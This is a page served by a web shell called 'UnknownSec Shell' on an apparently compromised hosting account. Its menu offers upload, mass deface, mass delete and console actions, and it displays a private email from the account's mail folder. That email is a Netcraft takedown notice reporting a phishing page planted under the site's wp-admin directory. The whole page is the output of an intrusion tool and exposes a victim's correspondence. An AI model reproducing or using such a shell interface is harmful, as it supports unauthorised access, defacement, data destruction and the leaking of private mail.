shell bypass 403
UnknownSec Shell
:
/
home
/
innovagencyco
/
mail
/
new
/ [
drwxr-x--x
]
upload
mass deface
mass delete
console
info server
name :
1729748696.M580133P2736706.imr70-cvps01.hostserv.co.za,S=8095,W=8255
Return-Path: <takedown-response+62456447@netcraft.com> Delivered-To: innovagencyco@imr70-cvps01.hostserv.co.za Received: from imr70-cvps01.hostserv.co.za by imr70-cvps01.hostserv.co.za with LMTP id 5H1rHdjeGWdCwikA+LLMVA (envelope-from <takedown-response+62456447@netcraft.com>) for <innovagencyco@imr70-cvps01.hostserv.co.za>; Thu, 24 Oct 2024 07:44:56 +0200 Return-path: <takedown-response+62456447@netcraft.com> Envelope-to: info@innovagency.co.za Delivery-date: Thu, 24 Oct 2024 07:44:56 +0200 Received: from spamtitan-filter08.hostserv.co.za ([41.185.250.80]:13735) by imr70-cvps01.hostserv.co.za with esmtp (Exim 4.98) (envelope-from <takedown-response+62456447@netcraft.com>) id 1t3qeW-0000000BTwC-3kwX for info@innovagency.co.za; Thu, 24 Oct 2024 07:44:56 +0200 Received: from localhost (localhost [127.0.0.1]) by spamtitan-filter08.hostserv.co.za (Postfix) with ESMTP id DA08417588A0 for <info@innovagency.co.za>; Thu, 24 Oct 2024 07:44:55 +0200 (SAST) X-Quarantine-ID: <k09WrqbFNqcD> X-Virus-Scanned: by SpamTitan at hostserv.co.za X-Spam-Flag: NO X-Spam-Score: 1.709 X-Spam-Level: * X-Spam-Status: No, score=1.709 tagged_above=-999 required=5 tests=[ANY_BOUNCE_MESSAGE=0.1, BOUNCE_MESSAGE=0.1, DKIM_SIGNED=0.1, DKIM_VALID=-0.1, DKIM_VALID_AU=-0.1, DKIM_VALID_EF=-0.1, DNSWL_DWL_MED=-0.2, RCVD_IN_DNSWL_BLOCKED=0.001, RCVD_IN_MSPIKE_H2=-0.001, RCVD_IN_SPFWL=-0.2, RCVD_IN_VALIDITY_CERTIFIED_BLOCKED=0.001, RCVD_IN_VALIDITY_RPBL_BLOCKED=0.001, SPF_HELO_NONE=0.001, SPF_PASS=-0.001, ST_KGM_OBFUSCATE_1=0.4, ST_KGM_OBFUSCATE_2=0.8, ST_LONG_ENVELOPE_FROM=0.906, URIBL_BLOCKED=0.001] autolearn=disabled Received: from spamtitan-filter08.hostserv.co.za (localhost [127.0.0.1]) by spamtitan-filter08.hostserv.co.za (Postfix) with ESMTP id EC97517588A1 for <info@innovagency.co.za>; Thu, 24 Oct 2024 07:44:43 +0200 (SAST) Authentication-Results: spamtitan-filter08.hostserv.co.za; dkim=pass (2048-bit rsa key sha256) header.d=netcraft.com header.i=@netcraft.com header.b=S9DYG3bE header.a=rsa-sha256 header.s=default202405-yu9bqteb95aqcfpg x-bits=2048; dmarc=pass policy.published-domain-policy=reject policy.applied-disposition=none policy.evaluated-disposition=none policy.policy-from=p header.from=netcraft.com; spf=pass smtp.mailfrom=takedown-response+62456447@netcraft.com smtp.helo=mail-1c.netcraft.com Received-SPF: pass (netcraft.com: 52.31.138.216 is authorized to use 'takedown-response+62456447@netcraft.com' in 'mfrom' identity (mechanism 'ip4:52.31.138.216' matched)) receiver=spamtitan-filter08.hostserv.co.za; identity=mailfrom; envelope-from="takedown-response+62456447@netcraft.com"; helo=mail-1c.netcraft.com; client-ip=52.31.138.216 Received: from mail-1c.netcraft.com (mail-1c.netcraft.com [52.31.138.216]) (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits) key-exchange X25519 server-signature RSA-PSS (2048 bits) server-digest SHA256) (No client certificate requested) by spamtitan-filter08.hostserv.co.za (Postfix) with ESMTPS id E6DEA175883B for <info@innovagency.co.za>; Thu, 24 Oct 2024 07:44:41 +0200 (SAST) Received: from walleye.netcraft.com (unknown [10.9.0.81]) (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits) key-exchange X25519 server-signature RSA-PSS (2048 bits) server-digest SHA256) (No client certificate requested) by mail-1c.netcraft.com (Postfix) with ESMTPS id D452C949 for <info@innovagency.co.za>; Thu, 24 Oct 2024 05:44:37 +0000 (UTC) DKIM-Filter: OpenDKIM Filter v2.11.0 mail-1c.netcraft.com D452C949 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=netcraft.com; s=default202405-yu9bqteb95aqcfpg; t=1729748677; bh=IC1tgCBfHRK1qOgT+Ggxq6TErGl9d0A9SdflB9XiJGo=; h=Date:From:Subject:To:From; b=S9DYG3bEHFt4M4nFXsA13exf4KA1+VD1+Q1pwTbsClc4twAwMjSmkd4tw52ONimks 6QzzpOouL6f2gPOojmBzKWHGBxNqe9iRCQL12JqKM8qoIBnwQ+2SnkuZqEdaUI33MD UDTwVpeoDNpHphfQmXpXpzLBSLBt3rlB9yO7YPc4pdSX1o1hCSXhfUG54RKkDX9zAp 2eRIlUd5bmcBRvhpCi1lLEFtywIP4fgijJX1GmEEPLxFW8Zxc9cr4PX8Ev6VTwZJtt GSjWpinx1DCVE+eWxdVMbelyZwqRCKEr1S8wKtzFZcrr1zy3nlmiAKCE+O6hR7LiOw YNcz+f753KpZg== Received: by walleye.netcraft.com (Postfix, from userid 507) id D039F10EE; Thu, 24 Oct 2024 05:44:37 +0000 (UTC) Content-Transfer-Encoding: 8bit Content-Type: multipart/report; boundary="_----------=_172974867726136341116"; report-type="feedback-report" MIME-Version: 1.0 Date: Thu, 24 Oct 2024 05:44:37 +0000 From: Netcraft Takedown Service <takedown-response+62456447@netcraft.com> Subject: Issue 62456447: Phishing attack at hxxps://isonxp.innovagency.co[.]za/wp-admin/x1/questions.html To: info@innovagency.co.za Message-Id: <126cf777e5b24d25ffa053379b030642@takedown.netcraft.com> X-Mailer: MIME::Lite 3.030 (F2.85; T2.17; A2.20; B3.15; Q3.13) This is a multi-part message in MIME format. --_----------=_172974867726136341116 Content-Disposition: inline Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset="UTF-8" Hello, We have discovered a phishing attack on your network. hxxps://isonxp.innovagency.co[.]za/wp-admin/x1/questions.html [41.185.64.77] Although we have previously contacted you about this attack, we are contacting you again because it has recently reappeared. It is possible that this attack is being restricted so it is only visible from certain countries. Before deciding that the attack has been resolved please confirm it cannot be viewed from the following countries: Australia We previously contacted you about this issue on 2024-10-23 22:09:14 (UTC). Since our last notification, the following additional URL(s) have been detected: hxxps://isonxp.innovagency.co[.]za/wp-admin/x1/questions.html You may not have been aware of this attack, however, you are still responsible for removing it. Please remove this fraudulent content, and any other associated fraudulent content, as soon as possible. More information about the detected issue is provided at https://incident.netcraft.com/373c101fd6aa/ Kind regards, Netcraft Phone: +44(0)1225 447500 Fax: +44(0)1225 448600 Netcraft Issue Number: 62456659 To contact us about updates regarding this attack, please respond to this email. Please note: replies to this address will be logged, but aren't always read. If you believe you have received this email in error, or you require further support, please contact: takedown@netcraft.com. This mail can be parsed with x-arf tools. Visit http://www.xarf.org/ for more information about x-arf. --_----------=_172974867726136341116 Content-Disposition: inline Content-Transfer-Encoding: 7bit Content-Type: message/feedback-report MIME-Version: 1.0 X-Mailer: MIME::Lite 3.030 (F2.85; T2.17; A2.20; B3.15; Q3.13) Date: Thu, 24 Oct 2024 05:44:37 +0000 Feedback-Type: xarf User-Agent: Netcraft Version: 1 --_----------=_172974867726136341116 Content-Disposition: attachment; filename="xarf.json" Content-Transfer-Encoding: base64 Content-Type: application/json; charset=utf-8; name="xarf.json" MIME-Version: 1.0 X-Mailer: MIME::Lite 3.030 (F2.85; T2.17; A2.20; B3.15; Q3.13) Date: Thu, 24 Oct 2024 05:44:37 +0000 eyJWZXJzaW9uIjoiMSIsIk9uQmVoYWxmT2YiOnsiQ29tcGxhaW5hbnRPcmciOiJBTlogQXVzdHJh bGlhIiwiQ29tcGxhaW5hbnRPcmdFbWFpbCI6InRha2Vkb3duLXJlc3BvbnNlKzYyNDU2NDQ3QG5l dGNyYWZ0LmNvbSIsIkNvbXBsYWluYW50T3JnRG9tYWluIjoid3d3LmFuei5jb20uYXUifSwiRGlz Y2xvc3VyZSI6dHJ1ZSwiUmVwb3J0ZXJJbmZvIjp7IlJlcG9ydGVyT3JnIjoiTmV0Y3JhZnQiLCJS ZXBvcnRlck9yZ0RvbWFpbiI6Im5ldGNyYWZ0LmNvbSIsIlJlcG9ydGVyT3JnRW1haWwiOiJ0YWtl ZG93bi1yZXNwb25zZSs2MjQ1NjQ0N0BuZXRjcmFmdC5jb20ifSwiUmVwb3J0Ijp7IlJlcG9ydFR5 cGUiOiJQaGlzaGluZyIsIlJlcG9ydGVyQ2FzZUlEIjoiNjI0NTY2NTkiLCJTb3VyY2VVcmwiOiJo dHRwczovL2lzb254cC5pbm5vdmFnZW5jeS5jby56YS93cC1hZG1pbi94MS9xdWVzdGlvbnMuaHRt bCIsIlJlcG9ydENsYXNzIjoiQ29udGVudCIsIkRhdGUiOiIyMDI0LTEwLTI0VDA1OjQzOjA2WiIs IlNvdXJjZUlwIjoiNDEuMTg1LjY0Ljc3IiwiRmlyc3RTZWVuIjoiMjAyNC0xMC0xNlQwMjowMjo0 M1oiLCJSZXBvcnRlck5vdGVzIjoiU2VlIGh0dHBzOi8vaW5jaWRlbnQubmV0Y3JhZnQuY29tLzM3 M2MxMDFmZDZhYS8gZm9yIG1vcmUgaW5mb3JtYXRpb24ifX0= --_----------=_172974867726136341116--
© 2024 UnknownSec